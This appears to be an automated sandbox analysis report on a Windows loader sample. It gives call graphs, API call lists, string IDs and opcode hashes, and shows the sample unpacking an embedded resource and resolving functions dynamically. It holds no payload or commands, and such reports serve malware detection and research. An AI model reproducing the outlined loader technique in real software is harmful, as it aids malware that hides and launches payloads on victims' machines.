API calls 19336->19337 19338 417c3e 19337->19338 19339 417c43 19338->19339 19340 417c78 19338->19340 19341 40bfc1 __commit 63 API calls 19339->19341 19342 417c82 19340->19342 19350 417caa 19340->19350 19343 417c48 19341->19343 19344 40bfc1 __commit 63 API calls 19342->19344 19345 40e744 __commit 6 API calls 19343->19345 19347 417c87 19344->19347 19345->19346 19346->19313 19348 40e744 __commit 6 API calls 19347->19348 19348->19346 19349 4168fc 98 API calls __tolower_l 19349->19350 19350->19346 19350->19349 19352 414818 CompareStringW 19351->19352 19356 41482f strncnt 19351->19356 19353 41483b GetLastError 19352->19353 19352->19356 19353->19356 19354 40ce09 __atodbl_l 5 API calls 19357 414b5a 19354->19357 19355 414a95 19358 417a20 ___ansicp 87 API calls 19355->19358 19356->19355 19360 4148a4 19356->19360 19382 414881 19356->19382 19357->19309 19359 414abb 19358->19359 19362 414b1c CompareStringA 19359->19362 19364 417a69 ___convertcp 70 API calls 19359->19364 19359->19382 19361 414962 MultiByteToWideChar 19360->19361 19363 4148e6 GetCPInfo 19360->19363 19360->19382 19369 414982 19361->19369 19361->19382 19365 414b3a 19362->19365 19362->19382 19367 4148f7 19363->19367 19363->19382 19368 414ae0 19364->19368 19366 40b6b5 type_info::_Type_info_dtor 63 API calls 19365->19366 19370 414b40 19366->19370 19367->19361 19367->19382 19375 417a69 ___convertcp 70 API calls 19368->19375 19368->19382 19376 40b84d _malloc 63 API calls 19369->19376 19381 41499f ___convertcp 19369->19381 19372 40b6b5 type_info::_Type_info_dtor 63 API calls 19370->19372 19371 4149d9 MultiByteToWideChar 19373 4149f2 MultiByteToWideChar 19371->19373 19374 414a83 19371->19374 19372->19382 19373->19374 19385 414a09 19373->19385 19378 4147ae __freea 63 API calls 19374->19378 19377 414b01 19375->19377 19376->19381 19379 414b16 19377->19379 19380 414b0a 19377->19380 19378->19382 19379->19362 19383 40b6b5 type_info::_Type_info_dtor 63 API calls 19380->19383 19381->19371 19381->19382 19382->19354 19383->19382 19384 414a53 MultiByteToWideChar 19386 414a66 CompareStringW 19384->19386 19387 414a7d 19384->19387 19388 414a1f ___convertcp 19385->19388 19389 40b84d _malloc 63 API calls 19385->19389 19386->19387 19390 4147ae __freea 63 API calls 19387->19390 19388->19374 19388->19384 19389->19388 19390->19374 19391->19186 19398 40d0f5 19392->19398 19395 40cd39 19396 40cd62 19395->19396 19397 40cd6e RaiseException 19395->19397 19396->19397 19397->19147 19399 40d115 _strlen 19398->19399 19403 40af59 19398->19403 19400 40b84d _malloc 63 API calls 19399->19400 19399->19403 19401 40d128 19400->19401 19402 40ef42 _strcpy_s 63 API calls 19401->19402 19401->19403 19402->19403 19403->19395 19405 4017f3 19404->19405 19406 4017e9 EntryPoint 19404->19406 19407 401805 19405->19407 19408 4017fb EntryPoint 19405->19408 19406->19405 19409 401818 19407->19409 19410 40180e EntryPoint 19407->19410 19408->19407 19411 401844 19409->19411 19412 40183e 19409->19412 19415 40b783 __recalloc 73 API calls 19409->19415 19410->19409 19416 40186d MultiByteToWideChar 19411->19416 19417 40184e EntryPoint 19411->19417 19422 40b743 19411->19422 19413 40b6b5 type_info::_Type_info_dtor 63 API calls 19412->19413 19413->19411 19418 40182d 19415->19418 19416->19153 19416->19154 19417->19411 19418->19411 19419 401834 EntryPoint 19418->19419 19419->19412 19421 401044 EntryPoint 19420->19421 19423 40e231 __calloc_impl 63 API calls 19422->19423 19424 40b75d 19423->19424 19425 40b779 19424->19425 19426 40bfc1 __commit 63 API calls 19424->19426 19425->19411 19427 40b770 19426->19427 19427->19425 19428 40bfc1 __commit 63 API calls 19427->19428 19428->19425 19430 40b6b5 __commit 19429->19430 19431 40b714 HeapFree 19430->19431 19433 40b73d __commit 19430->19433 19432 40b727 19431->19432 19431->19433 19434 40bfc1 __commit 63 API calls 19432->19434 19433->19173 19434->19433 19436 40aff8 19435->19436 19437 40b027 19436->19437 19438 40b01f __VEC_memcpy 19436->19438 19437->19177 19438->19437 19440 40e8ea __commit 19439->19440 19441 40d6e0 __lock 63 API calls 19440->19441 19442 40e8f1 19441->19442 19443 40e9ba __initterm 19442->19443 19444 40e91d 19442->19444 19458 40e9f5 19443->19458 19446 4104e9 __decode_pointer 6 API calls 19444->19446 19448 40e928 19446->19448 19450 40e9aa __initterm 19448->19450 19452 4104e9 __decode_pointer 6 API calls 19448->19452 19449 40e9f2 __commit 19449->18215 19450->19443 19457 40e93d 19452->19457 19453 40e9e9 19454 40e7ee _malloc 4 API calls 19453->19454 19454->19449 19455 4104e9 6 API calls __decode_pointer 19455->19457 19456 4104e0 6 API calls _doexit 19456->19457 19457->19450 19457->19455 19457->19456 19459 40e9d6 19458->19459 19460 40e9fb 19458->19460 19459->19449 19462 40d606 LeaveCriticalSection 19459->19462 19463 40d606 LeaveCriticalSection 19460->19463 19462->19453 19463->19459 19464 31d79308 19465 31d79348 CloseHandle 19464->19465 19467 31d79379 19465->19467

                                                                                                                                      Executed Functions

                                                                                                                                      Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 18 401c98-401c9a 16->18 20 401c7d-401c83 17->20 21 401c8f-401c91 17->21 22 401cb0-401cce call 401650 18->22 23 401c9c-401caf CloseHandle 18->23 20->16 25 401c85-401c8d 20->25 21->18 33 401cd0-401cd4 22->33 25->14 25->21 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 38 401f1c-401f2f 31->38 39 401f5f-401f69 31->39 36 401cf0-401cf2 33->36 37 401cd6-401cd8 33->37 42 401cf5-401cf7 36->42 40 401cda-401ce0 37->40 41 401cec-401cee 37->41 43 401f33-401f5d call 401560 38->43 44 401f73-401f75 39->44 45 401f6b-401f72 39->45 40->36 46 401ce2-401cea 40->46 41->42 42->23 47 401cf9-401d09 Module32Next 42->47 43->39 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->33 46->41 47->7 51 401d0f 47->51 49->5 86 4021aa-4021c0 49->86 50->49 55 401d10-401d2e call 401650 51->55 60 401d30-401d34 55->60 63 401d50-401d52 60->63 64 401d36-401d38 60->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 70 401d42-401d4a 66->70 67->68 68->23 71 401d5d-401d7b call 401650 68->71 70->60 70->67 77 401d80-401d84 71->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 81 401da5-401da7 79->81 83 401d8a-401d90 80->83 84 401d9c-401d9e 80->84 81->23 85 401dad-401dbd Module32Next 81->85 83->79 87 401d92-401d9a 83->87 84->81 85->7 85->55 89 4021c6-4021ca 86->89 90 40246a-402470 86->90 87->77 87->84 89->90 93 4021d0-402217 call 4018f0 89->93 91 402472-402475 90->91 92 40247a-402480 90->92 91->92 92->5 94 402482-402487 92->94 98 40221d-40223d 93->98 99 40244f-40245f 93->99 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 31c2d005 122->154 155 40234e call 31c2d01d 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 31c2d005 135->152 153 402390 call 31c2d01d 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                                                                                      APIs
                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                      • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                      • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                      • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                                      • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00401DC4
                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                      • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                      • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                      • _memset.LIBCMT ref: 00401EDD
                                                                                                                                      • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                      • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                      • API String ID: 1430744539-2962942730
                                                                                                                                      • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                      • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                      • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                                      • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                      Function 35182060 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 327COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 156 35182060-351820e2 160 351820e8-3518210d 156->160 161 35182326-35182359 156->161 166 35182360-35182395 160->166 167 35182113-35182138 160->167 161->166 174 3518239c-351823d1 166->174 167->174 175 3518213e-3518214e 167->175 179 351823d8-35182404 174->179 175->179 180 35182154-35182158 175->180 186 3518240b-35182449 179->186 182 3518215a-35182160 180->182 183 35182166-3518216b 180->183 182->183 182->186 187 35182179-3518217f 183->187 188 3518216d-35182173 183->188 190 35182450-3518248e 186->190 191 35182190-351821a4 187->191 192 35182181-35182189 187->192 188->187 188->190 226 35182495-3518251e 190->226 203 351821aa 191->203 204 351821a6-351821a8 191->204 192->191 208 351821af-351821c7 203->208 204->208 209 351821c9-351821cf 208->209 210 351821d1-351821d5 208->210 209->210 213 35182224-35182231 209->213 214 35182218-35182221 210->214 215 351821d7-35182203 GetActiveWindow 210->215 223 35182271 213->223 224 35182233-35182249 call 35181f90 213->224 214->213 216 3518220c-35182216 215->216 217 35182205-3518220b 215->217 216->213 217->216 255 35182271 call 35182de8 223->255 256 35182271 call 35182daf 223->256 233 35182268-3518226e 224->233 234 3518224b-35182262 224->234 252 3518252b 226->252 253 35182520-35182529 226->253 228 35182277-351822a0 call 35181f9c 236 351822a5-351822d5 228->236 233->223 234->226 234->233 236->161 254 3518252d-35182533 252->254 253->254 255->228 256->228
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ActiveWindow
                                                                                                                                      • String ID: ,l@4$xk@4$xk@4
                                                                                                                                      • API String ID: 2558294473-1587194999
                                                                                                                                      • Opcode ID: 7a190cac6878681b62e96c8cc49ff3e9503a65ea8f4ea2b4eb77e3ccf5c6ba5a
                                                                                                                                      • Instruction ID: cb62d544b764efa5a20e2ab5f86eb22779e467a12f43aa5996f09e69bbfcc202
                                                                                                                                      • Opcode Fuzzy Hash: 7a190cac6878681b62e96c8cc49ff3e9503a65ea8f4ea2b4eb77e3ccf5c6ba5a
                                                                                                                                      • Instruction Fuzzy Hash: 72C16E74B003059FEB159FA5D4147AEBBE6BFC9340F148829E916AB380DF389846CB65
                                                                                                                                      Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 257 4018f0-4018fa 258 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 257->258 259 4018fc-401900 257->259 262 401940-401949 GetLastError 258->262 263 401996-40199a 258->263 264 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 262->264 265 40198d-40198f 262->265 264->265 265->263 267 401991 call 401030 265->267 267->263
                                                                                                                                      APIs
                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                      • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3322701435-0
                                                                                                                                      • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                      • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                      • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                      • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                      Function 35183690 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 270 35183690-3518372f GetCurrentProcess 275 35183738-3518376c GetCurrentThread 270->275 276 35183731-35183737 270->276 277 3518376e-35183774 275->277 278 35183775-351837a9 GetCurrentProcess 275->278 276->275 277->278 280 351837ab-351837b1 278->280 281 351837b2-351837cd call 35183870 278->281 280->281 284 351837d3-35183802 GetCurrentThreadId 281->284 285 3518380b-3518386d 284->285 286 35183804-3518380a 284->286 286->285
                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 3518371E
                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 3518375B
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 35183798
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 351837F1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                      • Opcode ID: aa823adf57dc59c9c70211605d338fca33fd45191010f69b19d66a45542b0e98
                                                                                                                                      • Instruction ID: 3723a0055e9e183fbcb18aa2d68e5c8fd0d28d91f97734cb6ea69d6cc6c3a61a
                                                                                                                                      • Opcode Fuzzy Hash: aa823adf57dc59c9c70211605d338fca33fd45191010f69b19d66a45542b0e98
                                                                                                                                      • Instruction Fuzzy Hash: 5B5186B4900749DFDB50DFA9D988B9EBBF1AF88310F208459E009B7350D7359841CF69
                                                                                                                                      Function 351836A0 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 293 351836a0-3518372f GetCurrentProcess 297 35183738-3518376c GetCurrentThread 293->297 298 35183731-35183737 293->298 299 3518376e-35183774 297->299 300 35183775-351837a9 GetCurrentProcess 297->300 298->297 299->300 302 351837ab-351837b1 300->302 303 351837b2-351837cd call 35183870 300->303 302->303 306 351837d3-35183802 GetCurrentThreadId 303->306 307 3518380b-3518386d 306->307 308 35183804-3518380a 306->308 308->307
                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 3518371E
                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 3518375B
                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 35183798
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 351837F1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2063062207-0
                                                                                                                                      • Opcode ID: a46d49a7d8c0a645a35cb693126f7918ab9c151d26b8690deafb55c6d5925fa5
                                                                                                                                      • Instruction ID: 1b56012314ff05409e94e20defa7f919e1cb2dd14ae977b1850288489c1efa3d
                                                                                                                                      • Opcode Fuzzy Hash: a46d49a7d8c0a645a35cb693126f7918ab9c151d26b8690deafb55c6d5925fa5
                                                                                                                                      • Instruction Fuzzy Hash: B75165B0900749CFDB54DFAAD988B9EBBF1AF88310F248459D009B7360DB359945CF69
                                                                                                                                      Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 315 40af66-40af6e 316 40af7d-40af88 call 40b84d 315->316 319 40af70-40af7b call 40d2e3 316->319 320 40af8a-40af8b 316->320 319->316 323 40af8c-40af98 319->323 324 40afb3-40afca call 40af49 call 40cd39 323->324 325 40af9a-40afb2 call 40aefc call 40d2bd 323->325 325->324
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                        • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1411284514-0
                                                                                                                                      • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                      • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                      • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                      • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                      Function 35182056 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 175COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 334 35182056-351820e2 338 351820e8-3518210d 334->338 339 35182326-35182359 334->339 344 35182360-35182395 338->344 345 35182113-35182138 338->345 339->344 352 3518239c-351823d1 344->352 345->352 353 3518213e-3518214e 345->353 357 351823d8-35182404 352->357 353->357 358 35182154-35182158 353->358 364 3518240b-35182449 357->364 360 3518215a-35182160 358->360 361 35182166-3518216b 358->361 360->361 360->364 365 35182179-3518217f 361->365 366 3518216d-35182173 361->366 368 35182450-3518248e 364->368 369 35182190-351821a4 365->369 370 35182181-35182189 365->370 366->365 366->368 404 35182495-3518251e 368->404 381 351821aa 369->381 382 351821a6-351821a8 369->382 370->369 386 351821af-351821c7 381->386 382->386 387 351821c9-351821cf 386->387 388 351821d1-351821d5 386->388 387->388 391 35182224-35182231 387->391 392 35182218-35182221 388->392 393 351821d7-35182203 GetActiveWindow 388->393 401 35182271 391->401 402 35182233-35182249 call 35181f90 391->402 392->391 394 3518220c-35182216 393->394 395 35182205-3518220b 393->395 394->391 395->394 433 35182271 call 35182de8 401->433 434 35182271 call 35182daf 401->434 411 35182268-3518226e 402->411 412 3518224b-35182262 402->412 430 3518252b 404->430 431 35182520-35182529 404->431 406 35182277-351822a0 call 35181f9c 414 351822a5-351822d5 406->414 411->401 412->404 412->411 414->339 432 3518252d-35182533 430->432 431->432 433->406 434->406
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ActiveWindow
                                                                                                                                      • String ID: ,l@4$xk@4
                                                                                                                                      • API String ID: 2558294473-3522002665
                                                                                                                                      • Opcode ID: b2c14653403d72c050b39706e0a1e81bab7130f51279f8bb7dd252f3ba1e6c13
                                                                                                                                      • Instruction ID: 2b4c6693f154ffd7e83f142dd043f0d03095f7d1a6c57373ec3d573839626100
                                                                                                                                      • Opcode Fuzzy Hash: b2c14653403d72c050b39706e0a1e81bab7130f51279f8bb7dd252f3ba1e6c13
                                                                                                                                      • Instruction Fuzzy Hash: BA6139B4A003499FEB15DFA5C854B9DFBF2FF88340F108429E816AB290DB359846CF54
                                                                                                                                      Function 0040E7EE Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 435 40e7ee-40e7f6 call 40e7c3 437 40e7fb-40e7ff ExitProcess 435->437
                                                                                                                                      APIs
                                                                                                                                      • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                        • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                        • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                        • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040E7FF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2685924986.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000018.00000002.2685924986.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000018.00000002.2685924986.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2427264223-0
                                                                                                                                      • Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                      • Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
                                                                                                                                      • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                      • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5
                                                                                                                                      Function 351854C8 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 438 351854c8-3518556b GetCurrentThreadId 442 3518556d-35185573 438->442 443 35185574-351855b5 call 35184364 438->443 442->443
                                                                                                                                      APIs
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 3518555A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000018.00000002.2749536526.0000000035180000.00000040.00000800.00020000.00000000.sdmp, Offset: 35180000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_24_2_35180000_rpkhzpuO.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CurrentThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2882836952-0
                                                                                                                                      • Opcode ID: 82c8e83d64718e9e39263ed02e21600570f1db8f8bea9459ca93950cd16ebb9e
